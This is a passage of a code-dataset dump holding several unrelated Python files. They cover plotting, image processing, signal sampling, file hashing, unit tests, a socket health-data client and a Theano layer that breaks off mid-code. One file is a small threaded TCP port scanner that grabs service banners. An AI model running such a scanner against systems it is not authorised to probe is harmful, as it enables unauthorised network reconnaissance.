Try again')\n        else:\n            print_dict('Voter Preferences', vote_dict, lambda preference: preference[1])\n            break\n    #candidates_left is initially a set of all the candidates on an arbitrary voter preference\n    candidates_left = set(candidate for all_candidates in vote_dict.values() for candidate in all_candidates)\n    ballot_number = 1\n    while True:\n        print_dict( 'Vote count on ballot #{} with candidates (alphabetically) = {}:'.format(ballot_number,candidates_left),\n                    evaluate_ballot(vote_dict, candidates_left),\n                    lambda preference: preference[0])\n        print_dict( 'Vote count on ballot #{} with candidates (numerically) = {}:'.format(ballot_number,candidates_left),\n                    evaluate_ballot(vote_dict, candidates_left),\n                    lambda preference: preference[1], True)\n        candidates_left = remaining_candidates(evaluate_ballot(vote_dict, candidates_left))\n        ballot_number += 1\n        if len(candidates_left) == 1:\n            print('The winner is: {} '.format(candidates_left))\n            break\n        elif len(candidates_left) == 0:\n            print(' No winner: election is a tie among candidates remaining on the last ballot')\n            break\n    ","sub_path":"ics33/ICS33 Python Materials/test/test1/problem2.py","file_name":"problem2.py","file_ext":"py","file_size_in_byte":3309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"563173891","text":"from tkinter import filedialog,Tk\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.patches as mpatches\r\nfrom sklearn.cluster import KMeans\r\n\r\ndef rand_jitter(arr):\r\n    if type(arr) != str:\r\n        stdev = .001*(max(arr)-min(arr))\r\n        return arr + np.random.randn(len(arr)) * stdev\r\n    return arr\r\n\r\ndef Preprocessing(df,columns):\r\n    def handle_non_numerical_data(df):\r\n        columns = df.columns.values\r\n        for column in columns:\r\n            text_digit_vals = {}\r\n\r\n            def convert_to_int(val):\r\n                return text_digit_vals[val]\r\n\r\n            if df[column].dtype != np.int64 and df[column].dtype != np.float64:\r\n                column_contents = df[column].values.tolist()\r\n                unique_elements = set(column_contents)\r\n                x = 0\r\n                for unique in unique_elements:\r\n                    if unique not in text_digit_vals:\r\n                        text_digit_vals[unique] = x\r\n                        x += 1\r\n                df[column] = list(map(convert_to_int, df[column]))\r\n        return df\r\n    df = handle_non_numerical_data(df)\r\n    return df\r\n\r\n\r\nroot = Tk()\r\nroot.fileName = filedialog.askopenfilename(filetypes = ((\"howCode files\",\"*.csv\"),(\"All files\",\"*.*\")))\r\nroot.destroy()\r\ndf = pd.read_csv(root.fileName,delimiter=',')\r\n\r\n\r\nmenu = df.columns.values\r\nindice = 1\r\nfor i in menu:\r\n    print(str(indice) + str(\"-\") + str(i))\r\n    indice += 1\r\n# the answers are used as column indices, so cast the user input to int\r\nfirst = int(input(\"X axis:\"))\r\nsecond = int(input(\"Y axis:\"))\r\nthird = int(input(\"Point color:\"))\r\ncores = ['#440154','#46327E','#365C8D','#277F8E','#1FA187','#4AC16D','#A0DA39','#FCE625']\r\n##########################################################################################################\r\n\r\nif (df[df.columns[first - 1]].dtype != np.int64 and df[df.columns[first - 1]].dtype != np.float64) or \\\r\n   (df[df.columns[second-1]].dtype != np.int64 and df[df.columns[second-1]].dtype != np.float64):\r\n    #########################################################################################################\r\n\r\n    if(df[df.columns[first-1]].dtype != np.int64 and df[df.columns[first-1]].dtype != np.float64):\r\n        names = set(df[df.columns.values[first - 1]].values.tolist())\r\n        x = range(len(set(df[df.columns.values[first - 1]].values.tolist())))\r\n        plt.xticks(x, names)\r\n    if(df[df.columns[second-1]].dtype != np.int64 and df[df.columns[second-1]].dtype != np.float64):\r\n        names = set(df[df.columns.values[second - 1]].values.tolist())\r\n        y = range(len(set(df[df.columns.values[second - 1]].values.tolist())))\r\n        plt.yticks(y, names)\r\n    #########################################################################################################\r\n    df = Preprocessing(df, df.columns)\r\n\r\n    x = df[df.columns[first-1]]\r\n    y = df[df.columns[second-1]]\r\n    z = df[df.columns[third - 1]]\r\n\r\n\r\n    plt.scatter(rand_jitter(x), rand_jitter(y), alpha=0.6, s=100, c=z, marker='o')\r\n    plt.title(df.columns.values[first - 1] + \" X \" + df.columns.values[second - 1])\r\n\r\n\r\nelse:\r\n    x = df[df.columns[first - 1]]\r\n    y = df[df.columns[second - 1]]\r\n    z = df[df.columns[third - 1]]\r\n\r\n\r\n    plt.scatter(rand_jitter(x), rand_jitter(y), alpha=0.6, s=100, c=z, marker='o')\r\n    plt.title(df.columns.values[first - 1] + \" X \" + df.columns.values[second - 1])\r\n    plt.xlabel(df.columns.values[first - 1])\r\n    plt.ylabel(df.columns.values[second - 1])\r\n\r\nplt.subplots_adjust(top=0.95, bottom=0.1, left=0.11, right=0.8)\r\n\r\nif(third is not None):\r\n    legenda = set(df[df.columns.values[third - 1]])\r\n    legenda = sorted(legenda)\r\n\r\n\r\n    vet = []\r\n    x = sorted(legenda)\r\n    # floor division is required here: a plain / produces float indices and\r\n    # raises a TypeError under Python 3\r\n    vet.append(min(x))\r\n    vet.append(x[len(x) // 8])\r\n    vet.append(x[2 * len(x) // 8])\r\n    vet.append(x[3 * len(x) // 8])\r\n    vet.append(x[4 * len(x) // 8])\r\n    vet.append(x[5 * len(x) // 8])\r\n    vet.append(x[6 * len(x) // 8])\r\n    vet.append(max(x))\r\n\r\n\r\n    ind = 0\r\n    patch = []\r\n    while(ind <= len(vet) - 1):\r\n        patch.append(mpatches.Patch(color = cores[ind] , label=vet[ind]))\r\n        ind += 1\r\n\r\n    plt.legend(handles=patch,bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.)\r\n\r\nw = []\r\nx1 = df[df.columns[first - 1]].tolist()\r\nx2 = df[df.columns[second - 1]].tolist()\r\nfor i in range(len(x1)):\r\n    w.append([x1[i],x2[i]])\r\n\r\nn_clusters = int(input(\"Number of clusters:\"))\r\nclf = KMeans(n_clusters=n_clusters)\r\nclf.fit(w)\r\n\r\ncentroids = clf.cluster_centers_\r\nlabels = clf.labels_\r\nplt.scatter(centroids[:,0], centroids[:,1],marker = 'x',c = 'red',s = 300)\r\n\r\nplt.show()\r\n","sub_path":"IC-CC/teste.py","file_name":"teste.py","file_ext":"py","file_size_in_byte":4665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"86664820","text":"import cv2\nimport os, json\nfrom enum import Enum\nimport numpy as np\n\nfrom Folder.tracedetector import TraceDetectorColor\n\nclass PaletteColor(Enum):\n    UNKNOWN = 0\n    GREEN = 1\n    BLUE = 2\n    BROWN = 3\n    YELLOW = 4\n\nDEFAUT_APP_PATH = '/Users/macbook/Projects/ferrero_backup/rosher_cv'\n\n# Create the detector and fill its fields with the colors from detector_left.json\ndetector_left = TraceDetectorColor()\nwith open(os.path.join(DEFAUT_APP_PATH, 'resources', 'colors', 'detector_left.json'), '+rb') as f:\n    payload_left = json.load(f)\n    palette_main_colors_left = dict()\n    for k, v in payload_left['palette_main_colors'].items():\n        palette_main_colors_left[PaletteColor(int(k))] = np.array(v)\n    palette_threshold_left = int(payload_left['palette_threshold'])\n    palette_minor_colors_left = dict()\n    for k, v in payload_left['palette_minor_colors'].items():\n        palette_minor_colors_left[PaletteColor(int(k))] = v\n    ignor_thresholds_left = dict()\n    for k, v in payload_left['ignor_thresholds'].items():\n        
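# JSON object keys are always strings, so each key is converted back into\n        # a PaletteColor enum member before it is used as a dictionary key:\n        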
ignor_thresholds_left[PaletteColor(int(k))] = v\n\n    detector_left.ignor_thresholds = ignor_thresholds_left\n    detector_left.palette_threshold = palette_threshold_left\n    detector_left.palette_main_colors = palette_main_colors_left\n    detector_left.palette_minor_colors = palette_minor_colors_left\n\n    detector_left.precalculate()\n    detector_left.precalculate_ignor()\n\n# preprocess, with the mask transformations carried over from batchmanager\ndef preprocess(source_image):\n    cv2.imwrite('source.jpeg', source_image)\n    dst = cv2.cvtColor(source_image, cv2.COLOR_BGR2HSV)\n    cv2.imwrite('hsv.jpeg', dst)\n\n\n    morph = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (10, 10))\n    tmp = cv2.erode(cv2.imread('mask_erode1.jpeg', 0), morph, iterations=1)\n    # cv2.imwrite('mask_erode1.jpeg', tmp)\n\n    mask = cv2.bitwise_and(tmp, cv2.bitwise_not(cv2.inRange(dst, (0, 0, 195), (180, 60, 255))))\n    cv2.imwrite('with_blinds.jpeg', mask)\n    dst = cv2.bitwise_and(dst, dst, mask=mask)\n\n    dst = np.uint8(np.float32(dst) / 10) * 10\n    cv2.imwrite('after_zip.jpeg', dst)\n    return dst, mask\n\n# Open the contaminated image and run it through preprocessing\nstart_image = cv2.imread('1_right.png', 1)\nimg, mask = preprocess(start_image)\nsource_preprocessed_image_roi = img\npreprocessed_mask = mask\ntotal_mask = mask\nminDiff = 10000000\nminDiffClr = PaletteColor.UNKNOWN\n\n# Filter by minor_colors and compute the result\nwith open(os.path.join(DEFAUT_APP_PATH, 'resources', 'colors', 'detector_left.json'), 'rb') as f:\n    payload_left = json.load(f)\n    palette_bcgr_color = cv2.mean(source_preprocessed_image_roi, preprocessed_mask)[0:3]\n    palette_main_colors_left = dict()\n    local_mask = np.array(())\n    for k, v in payload_left['palette_main_colors'].items():\n        palette_main_colors_left[PaletteColor(int(k))] = np.array(v)\n    for key, value in palette_main_colors_left.items():\n        diff = np.linalg.norm(value - palette_bcgr_color)\n        if (diff < minDiff and diff < detector_left.palette_threshold):\n            minDiffClr = key\n            minDiff = diff\n\n    for lower, highest in detector_left.palette_minor_colors_precalculated.get(minDiffClr):\n        local_mask = cv2.bitwise_not(cv2.inRange(source_preprocessed_image_roi, lower, highest))\n        total_mask = cv2.bitwise_and(total_mask, local_mask)\n    cv2.imwrite('local_mask.jpeg', total_mask)\n\n    mask_final = cv2.erode(total_mask, detector_left._morphology_kernel, iterations=1)\n    masked_res = cv2.bitwise_and(source_preprocessed_image_roi, source_preprocessed_image_roi, mask=mask_final)\n    cv2.imwrite('final.jpeg', masked_res)\n    res = np.sum(mask_final) / 255\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()","sub_path":"Folder/cv2algorithm.py","file_name":"cv2algorithm.py","file_ext":"py","file_size_in_byte":4177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"52748980","text":"import math as mt\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom PIL import Image\nfrom skimage import io\nfrom scipy.signal import argrelextrema\n\n#2\nA = 1.0\nfs = 4000\nq = 8\n\ndef s(t, f):\n    return A*np.sin(2*np.pi*f*t)\n\ndef probkowanie(i, f):\n    arr = []\n    for t in i:\n        arr.append(s(t, f))\n    return arr\n\nx = np.arange(0, 1, 1/fs)\nt = [20, 21, 30, 45, 50, 100, 150, 200, 250, 1000]\n\n\nfor czest in t:\n    y = probkowanie(x, czest)\n    plt.plot(x, y)\n    plt.xlabel('t[s]')\n    plt.ylabel('F(t)')\n    plt.title(str(czest) + 'Hz')\n    plt.show()\n\n'''\n4)\nSampling theorem (Nyquist-Shannon theorem):\na continuous signal can be reconstructed from its discrete samples\nif it was sampled at a rate at least twice the highest frequency\nof its spectrum.\n5)\nAliasing is an irreversible distortion of a signal introduced during\nsampling when the assumptions of the sampling theorem are not met.\nIt shows up as components at wrong frequencies (aliases)\nin the resulting signal.\n\n'''\n\n\n#3\nimg = io.imread('./first.png')\nchang = []\nfor i in range(3):\n    chang.append(img.copy())\n\n\nplt.imshow(img)\nplt.show()\nprint(img.shape)\nprint(len(img[0,0,:]))\nrows,cols = img.shape[0:2]\n\n# lightness method: (max + min) / 2\nfor i in range(rows):\n    for j in range(cols):\n        chang[0][i,j, 0:3] = ((max(chang[0][i,j,0:3]) + min(chang[0][i,j,0:3])) // 2)\n\n\n# average method: (R + G + B) / 3\nfor i in range(rows):\n    for j in range(cols):\n        chang[1][i,j, 0:3] = (sum(chang[1][i,j,0:3]) // 3)\n\n# luminosity method: weighted channels\nfor i in range(rows):\n    for j in range(cols):\n        chang[2][i,j, 0:3] = (0.21*chang[2][i,j,0]) + (0.72*chang[2][i,j,1]) + (0.07*chang[2][i,j,2])\n\n\nfig, axs = plt.subplots(3)\nfig.suptitle('Grayscale')\nfor i in range(3):\n    axs[i].imshow(chang[i])\nplt.show()\n\n\nfig, axs = plt.subplots(3)\nfig.suptitle('Histograms')\nfor i in range(3):\n    histogram, bin_edges = np.histogram(chang[i], bins=256)\n    axs[i].plot(bin_edges[0:-1], histogram)\n\nplt.show()\n\nhistogram, bin_edges = np.histogram(chang[1], bins=16)\nplt.plot(bin_edges[0:-1], histogram)\nplt.show()\n\nnew = bin_edges.mean()\nimg[:,:,0:3] = img[:,:,0:3] * new\nplt.imshow(img)\nplt.show()\nhistogram, bin_edges = np.histogram(img, bins=256)\nplt.plot(bin_edges[0:-1], histogram)\nplt.show()\n\n#4\nfig, axs = plt.subplots(3)\n\nimg = io.imread('./second.jpg')\naxs[0].imshow(img)\n\nrows,cols = img.shape[0:2]\n\ncp=img.copy()\nfor i in range(rows):\n    for j in range(cols):\n        cp[i,j, 0:3] = (0.21*cp[i,j,0]) + (0.72*cp[i,j,1]) + (0.07*cp[i,j,2])\naxs[1].imshow(cp)\n\n_ = axs[2].hist(cp[:, :, 0:3].ravel(), bins = 256, color = 'red', alpha = 0.5)\n_ = plt.xlabel('Intensity Value')\n_ = plt.ylabel('Count')\n_ = plt.legend(['Total', 'Red_Channel', 'Green_Channel', 'Blue_Channel'])\nplt.show()\n\npicture = Image.open(\"./second.jpg\")\n\ndef prog(histogram):\n    return sum(histogram[1]) // len(histogram[1])\n\nhistogram = np.histogram(picture)\npr = prog(histogram)\n\n\nprint(pr)\npr = pr * 3\n\n# PIL addresses pixels as (x, y) = (column, row), and channel values max out\n# at 255, not 256\nfor i in range(rows):\n    for j in range(cols):\n        if pr > sum(picture.getpixel( (j, i) )):\n            picture.putpixel( (j, i), (0,0,0))\n        else:\n            picture.putpixel( (j, i), (255,255,255))\nplt.imshow(picture)\nplt.show()\n\n\npicture = Image.open(\"./second.jpg\")\nfor i in range(rows):\n    for j in range(cols):\n        if pr < sum(picture.getpixel( (j, i) )):\n            picture.putpixel( (j, i), (255,255,255))\nplt.imshow(picture)\nplt.show()\n","sub_path":"dyskretyzacja,_kwantyzacja_binaryzacja/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":3425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"374153778","text":"#FileParser.py -- read a file from user-specified input. 
Each time it reads a user-specified chunk, computes its hash, counts the hits of each hash,\n#and stores the result in a user-specified file\n\n#example:\n#python FileParser.py test.doc 8192 1000 testDB\n#   test.doc: file to be read\n#   8192: read 8k bytes every time\n#   1000: start offset when reading\n#   testDB: save file info to testDB\n\nimport FileReader\nimport sys\nimport os\nimport hashlib\nimport timeit\nimport numpy as np\nimport pickle\nfrom pathlib import Path\n\n\n#main:\nif len(sys.argv) == 1:\n    print(' Usage: read a file, parse it, and store parse info into a file\\n\\\n    Example: python FileParser.py test.doc 8192 1000 testDB\\n\\\n    test.doc: file to be read\\n\\\n    8192: read 8k bytes every time\\n\\\n    1000: start offset when reading\\n\\\n    testDB: save parse info to testDB')\n    sys.exit(0)\n\nreader = FileReader.FileReader()\n\nreader.fileToBeRead = sys.argv[1]\nreader.fileToBeSaved = sys.argv[4]\nreader.fileSize = os.path.getsize(sys.argv[1])\nreader.chunkSize = int(sys.argv[2])\nreader.readStartPos = int(sys.argv[3])\nreader.fileHash = np.zeros(reader.tableSize, dtype=np.uint32)\n#use this table to store offset of each hit in the fileHash table\nreader.offsetTable = []\nfor i in range(0, reader.tableSize):\n    reader.offsetTable.append([])\n\n#open file as binary:\nf = open(reader.fileToBeRead, \"rb\")\n\n#jump to start position (seek is much faster than reading byte by byte):\nf.seek(reader.readStartPos)\n\nbytesChunk = np.frombuffer(f.read(reader.chunkSize), dtype=np.uint8)\n\ni = 0\ntotalSum = 0\n\nstart = timeit.default_timer()\nwhile bytesChunk.size != 0:\n    tempHash = bytesChunk.sum() % reader.tableSize\n    reader.fileHash[tempHash] += 1\n\n    #this is not the real offset, but it can be used to calculate offset:\n    reader.offsetTable[tempHash].append(i)\n\n    bytesChunk = np.frombuffer(f.read(reader.chunkSize), dtype=np.uint8) #summing with numpy is much faster than a plain Python loop\n    i += 1\nstop = timeit.default_timer()\n\nprint(\"loop: \" + str(i))\nprint(\"min:\" + str(reader.fileHash.min()) + \" max:\" + str(reader.fileHash.max()) + \" at index:\" + str(reader.fileHash.argmax()) + \" mean:\" + str(reader.fileHash.mean()))\nprint(\"cost time: \")\nprint(stop-start)\n\n#save FileReader to file:\nif Path(reader.fileToBeSaved).is_file():\n    os.remove(reader.fileToBeSaved)\n\nwith open(reader.fileToBeSaved, 'wb') as pickler:\n    pickle.dump(reader, pickler, pickle.HIGHEST_PROTOCOL)\n\nf.close()\n","sub_path":"FileParser.py","file_name":"FileParser.py","file_ext":"py","file_size_in_byte":2397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"477452250","text":"__author__ = 'pdiazv'\n\nfrom test_utils import enginetest, stubs\nfrom repository.managers import eventmanager\nfrom repository.models import Location, Athlete\nfrom repository.test_repository.stubs import MockValidator\n\nclass TestEventManager(enginetest.BaseEngineTestCase):\n\n    def setUp(self):\n        self.setUpTestbed()\n\n        self.validator = MockValidator(True)\n        self.manager = eventmanager.EventManager(self.validator)\n        location = Location(name='TestLoc1')\n        self.location_key = location.put()\n\n        athlete = Athlete(name='Pedro', location=self.location_key, source='fb', source_id='16234', gender='male')\n        self.athlete_key = athlete.put()\n\n    def test_add_single_event(self):\n        event = self.getEvent('Hawthorn Trail')\n\n        key = self.manager.add(self.athlete_key, event)\n        result = key.get()\n\n        self.validateEvent(result, event)\n\n    def test_add_single_event_validation_fails(self):\n        event = self.getEvent('Hawthorn Trail')\n        result = 
stubs.MockResult()\n\n self.validator.setError('InvalidEvent')\n key = self.manager.add(self.athlete_key, event, result)\n\n self.assertIsNone(key)\n self.assertTrue(result.errorCodeFound('InvalidEvent'))\n\n def test_modify_event(self):\n event = self.getEvent('Hawthorn Trail')\n new_event = self.getEvent('New Name', 'New Descr', '10/08/2015', '1.45,9.789')\n\n parent_key = self.athlete_key.get().location\n\n key = self.manager.add(self.athlete_key, event)\n\n new_event['id'] = str(key.id())\n result = self.manager.update(parent_key, new_event).get()\n\n self.validateEvent(result, new_event)\n\n def test_modify_event_validation_fails(self):\n event = self.getEvent('Hawthorn Trail')\n new_event = self.getEvent('New Name', 'New Descr', '10/08/2015', '1.45,9.789')\n\n parent_key = self.athlete_key.get().location\n key = self.manager.add(self.athlete_key, event)\n\n self.validator.set_status(False)\n new_event['id'] = str(key.id())\n result = self.manager.update(parent_key, new_event)\n\n self.assertIsNone(result)\n\n def test_list_events_by_athlete(self):\n event1 = self.getEvent('event1')\n event2 = self.getEvent('event2')\n\n self.manager.add(self.athlete_key, event1)\n self.manager.add(self.athlete_key, event2)\n\n result = self.manager.listByAthlete(self.athlete_key)\n\n self.assertEqual(2, len(result))\n self.assertEqual('event1', result[0].name)\n self.assertEqual('event2', result[1].name)\n\n def test_list_events_by_location(self):\n event1 = self.getEvent('event1')\n event2 = self.getEvent('event2')\n\n self.manager.add(self.athlete_key, event1)\n self.manager.add(self.athlete_key, event2)\n\n loc_key = self.athlete_key.get().location\n result = self.manager.listByLocation(loc_key)\n\n self.assertEqual(2, len(result))\n self.assertEqual('event1', result[0].name)\n self.assertEqual('event2', result[1].name)\n\n def test_get_by_name(self):\n event = self.getEvent('HelloWorld')\n\n orig_key = self.manager.add(self.athlete_key, event)\n result = self.manager.getByName('HelloWorld')\n\n self.assertEqual(result.name, 'HelloWorld')\n self.assertEqual(orig_key, result.key)\n\n def validateEvent(self, result, event):\n self.assertEqual(result.name, event['name'])\n self.assertEqual(result.description, event['description'])\n self.assertEqual(result.distance, event['distance'])\n self.assertEqual(result.difficulty, event['difficulty'])\n self.assertEqual(result.date.strftime('%m/%d/%Y'), event['date'])\n\n def getEvent(self, name=None, descr=None, date=None, coords=None):\n return {\n 'name': name,\n 'description': 'sample descr' if descr is None else descr,\n 'date': '12/16/2018' if date is None else date,\n 'start_coord': '16.489,23.785' if coords is None else coords,\n 'distance': 46,\n 'difficulty': 6\n }","sub_path":"repository/test_repository/test_eventmanager.py","file_name":"test_eventmanager.py","file_ext":"py","file_size_in_byte":4103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"1810301","text":"import socket\r\nimport time\r\nimport random\r\nimport json\r\nfrom random import seed\r\nfrom datetime import datetime\r\nimport pytz\r\n# create TCP/IP socket\r\n\r\n\r\n\r\nfrom tkinter import *\r\n\r\nwindow = Tk()\r\n\r\nwindow.title(\"Welcome to e-health Tracker\")\r\n\r\nwindow.geometry('350x200')\r\n\r\nlbl = Label(window, text=\"Hello\",bg=\"blue\")\r\n\r\nlbl.grid(column=0, row=0)\r\n\r\ndef clicked():\r\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n i=0\r\n# retrieve local hostname\r\n local_hostname = 
socket.gethostname()\r\n\r\n# get fully qualified hostname\r\n    local_fqdn = socket.getfqdn()\r\n\r\n# get the according IP address\r\n    ip_address = socket.gethostbyname(local_hostname)\r\n\r\n# connect to the server on port 9999\r\n    server_address = (ip_address, 9999)\r\n    sock.connect(server_address)\r\n    print(\"connecting to %s (%s) with %s\" % (local_hostname, local_fqdn, ip_address))\r\n\r\n\r\n    IDi = random.randint(1,100)\r\n    Systolici = random.randint(110,140)\r\n    Diastolici = random.randint(70,120)\r\n    Pulsei = random.randint(60,100)\r\n    Timei = time.asctime(time.localtime(time.time()))\r\n    Tempi = random.randint(34,40)\r\n    Oxygeni = random.randint(90,105)\r\n\r\n    records = {\r\n    \"ID\": IDi,\r\n    \"Systolic\":Systolici,\r\n    \"Diastolic\":Diastolici,\r\n    \"Pulse\": Pulsei,\r\n    \"Time\": Timei,\r\n    \"Temp\":Tempi,\r\n    \"Oxygen\":Oxygeni\r\n    }\r\n\r\n    print('measure', records)\r\n    json_object = json.dumps( records, indent=4)\r\n    print(\"json\", json_object)\r\n    lbl.configure(text=str(json_object))\r\n    new_data = ( \"%s\" % json_object).encode(\"utf-8\")\r\n    sock.sendall(new_data)\r\n\r\n    # wait for two seconds\r\n    time.sleep(2)\r\n\r\n# close connection\r\n    sock.close()\r\n\r\n\r\nbtn = Button(window, text=\"New Measurement\",bg=\"yellow\", command=clicked)\r\n\r\nbtn.grid(column=1, row=0)\r\n\r\nwindow.mainloop()\r\n","sub_path":"e-healthTrackerDeviceclient.py","file_name":"e-healthTrackerDeviceclient.py","file_ext":"py","file_size_in_byte":2053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"366200254","text":"import argparse\nimport socket\nfrom socket import *\nfrom threading import Thread, Semaphore\n\nscreenlock = Semaphore(value=1)\n\ndef conScan(hostname, port):\n\ttry:\n\t\tconn = socket(AF_INET, SOCK_STREAM)\n\t\tconn.connect((hostname, port))\n\t\tconn.send(b\"This is just a test\")  # sockets take bytes, not str, under Python 3\n\t\tresult = conn.recv(1000)\n\t\tscreenlock.acquire()\n\t\tprint(\"[+] {}/tcp open\".format(port))\n\t\tprint(\"[+] {}\".format(result))\n\texcept Exception as e:\n\t\tscreenlock.acquire()\n\t\tprint(\"[+] {}/tcp closed\".format(port))\n\tfinally:\n\t\tscreenlock.release()\n\t\tconn.close()\n\ndef portScan(hostname, ports):\n\ttry:\n\t\tip = gethostbyname(hostname)\n\t\tprint(\"[+] Found ip {} for {}\".format(ip, hostname))\n\t\taddr = gethostbyaddr(ip)\n\t\tprint(\"[+] Found actual hostname {}\".format(addr[0]))\n\t\tprint(\"[+] Alternative hostnames {}\".format(addr[1]))\n\t\tprint(\"[+] IPV4/V6 addresses {}\".format(addr[2]))\n\texcept Exception as e:\n\t\tprint(\"[-] Cannot resolve {}\".format(hostname))\n\t\treturn\n\tsetdefaulttimeout(10)\n\tfor port in ports:\n\t\tprint(\"[*] Scanning port : {}\".format(port))\n\t\tt = Thread(target=conScan, args=(hostname, port))\n\t\tt.start()\ndef main():\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument(\"-H\", \"--hostname\", type=str, help=\"[*] This is hostname\")\n\tparser.add_argument(\"-p\", \"--ports\", type=str, help=\"[*] These are ports\")\n\targs = parser.parse_args()\n\tif args.hostname == None or args.ports == None:\n\t\tif args.hostname == None:\n\t\t\tprint(\"[-] Hostname is required\")\n\t\tif args.ports == None:\n\t\t\tprint(\"[-] Ports are required\")\n\t\treturn\n\thostname = 
args.hostname\n\tports = [int(i) for i in args.ports.split(\", \")]\n\tportScan(hostname, ports)\n\nif __name__ == '__main__':\n\tmain()","sub_path":"Python/Pen Test/Penetration Test.py","file_name":"Penetration Test.py","file_ext":"py","file_size_in_byte":1631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"555979820","text":"from itertools import product\n\nfrom torch import Tensor\n\nfrom torch_kalman.covariance import Covariance\nfrom torch_kalman.kalman_filter import KalmanFilter\nfrom torch_kalman.tests import TestCaseTK, simple_mv_velocity_design, name_to_proc\n\nimport numpy as np\nfrom filterpy.kalman import KalmanFilter as filterpy_KalmanFilter\n\n\nclass TestKalmanFilter(TestCaseTK):\n season_start = '2010-01-04'\n\n def test_complex_kf_init(self):\n proc_specs = {'hour_in_day': {'K': 3},\n 'day_in_year': {'K': 3},\n 'local_level': {'decay': (.33, .95)},\n 'local_trend': {'decay_position': (0.95, 1.00), 'decay_velocity': (0.90, 1.00)}\n }\n processes = []\n for id, pkwargs in proc_specs.items():\n processes.append(name_to_proc(id, **pkwargs))\n processes[-1].add_measure('measure')\n\n kf = KalmanFilter(measures=['measure'], processes=processes)\n\n def test_equations(self):\n data = Tensor([[-50., 50., 1.]])[:, :, None]\n\n #\n design = simple_mv_velocity_design(dims=1)\n batch_design = design.for_batch(1, 1)\n torch_kf = KalmanFilter(processes=design.processes.values(), measures=design.measures)\n pred = torch_kf(data)\n\n #\n filter_kf = filterpy_KalmanFilter(dim_x=2, dim_z=1)\n filter_kf.x = torch_kf.design.init_state_mean_params.detach().numpy()[:, None]\n filter_kf.P = Covariance.from_log_cholesky(torch_kf.design.init_cholesky_log_diag,\n torch_kf.design.init_cholesky_off_diag).detach().numpy()\n\n filter_kf.F = batch_design.F(0)[0].detach().numpy()\n filter_kf.H = batch_design.H(0)[0].detach().numpy()\n filter_kf.R = batch_design.R(0)[0].detach().numpy()\n filter_kf.Q = batch_design.Q(0)[0].detach().numpy()\n filter_kf.states = []\n for t in range(data.shape[1]):\n filter_kf.states.append(filter_kf.x)\n filter_kf.update(data[:, t, :])\n filter_kf.predict()\n filterpy_states = np.stack(filter_kf.states).squeeze()\n kf_states = pred.means.detach().numpy().squeeze()\n\n for r, c in product(*[range(x) for x in kf_states.shape]):\n self.assertAlmostEqual(filterpy_states[r, c], kf_states[r, c], places=3)\n","sub_path":"torch_kalman/tests/test_kalman_filter.py","file_name":"test_kalman_filter.py","file_ext":"py","file_size_in_byte":2342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"569746087","text":"import numpy as np\n\ndef position_value(terrain, altitude, reward_dict, probability_dict):\n damage_probability = probability_dict['damage_probability'][altitude]\n if terrain in probability_dict['stuck_probability'].keys():\n stuck_probability = probability_dict['stuck_probability'][terrain]\n else:\n stuck_probability = 0.0\n if terrain in probability_dict['sunk_probability'].keys():\n sunk_probability = probability_dict['sunk_probability'][terrain]\n else:\n sunk_probability = 0.0\n damaged = np.random.random() < damage_probability\n stuck = np.random.random() < stuck_probability\n sunk = np.random.random() < sunk_probability\n package_state = 'DAMAGED' if damaged else 'OK'\n package_state += '_STUCK' if stuck else ''\n package_state += '_SUNK' if sunk else ''\n #print(\"Package state:\", package_state)\n reward = reward_dict[package_state]\n return 
reward\n","sub_path":"build/lib/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"540857691","text":"#!/usr/bin/env python\n\n# Based on http://deeplearning.net/tutorial/code/mlp.py\nimport numpy\nimport theano\nimport theano.tensor as T\n\nclass NNLayer(object):\n\tdef __init__(self, rng, parent, n_in, n_out, weight=None, bias=None, activation=T.tanh):\n\t\t\"\"\"\n\t\tLayer of a neural network using theano\n\n\t\t:type rng: numpy.random.RandomState\n\t\t:param rng: a random number generator used to initialize weights\n\n\t\t:type input: theano.tensor.dmatrix\n\t\t:param input: a symbolic tensor of shape (n_examples, n_in)\n\n\t\t:type n_in: int\n\t\t:param n_in: dimensionality of input\n\n\t\t:type n_out: int\n\t\t:param n_out: number of hidden units\n\n \t\t:type activation: theano.Op or function\n\t\t:param activation: Non linearity to be applied in the hidden\n\t\tlayer\n\t\t\"\"\"\n\t\tself.parent = parent\n\t\tself.activation = activation\n\n\t\t# `W` is initialized with `W_values` which is uniformely sampled\n\t\t# from sqrt(-6./(n_in+n_hidden)) and sqrt(6./(n_in+n_hidden))\n\t\t# for tanh activation function\n\t\t# the output of uniform if converted using asarray to dtype\n\t\t# theano.config.floatX so that the code is runable on GPU\n\t\t# Note : optimal initialization of weights is dependent on the\n\t\t# activation function used (among other things).\n\t\t# For example, results presented in [Xavier10] suggest that you\n\t\t# should use 4 times larger initial weights for sigmoid\n\t\t# compared to tanh\n\t\t# We have no info for other function, so we use the same as\n\t\t# tanh.\n\t\tif weight is None:\n\t\t\tweight_values = numpy.asarray(\n\t\t\t\trng.uniform(\n\t\t\t\t\tlow=-numpy.sqrt(6. / (n_in + 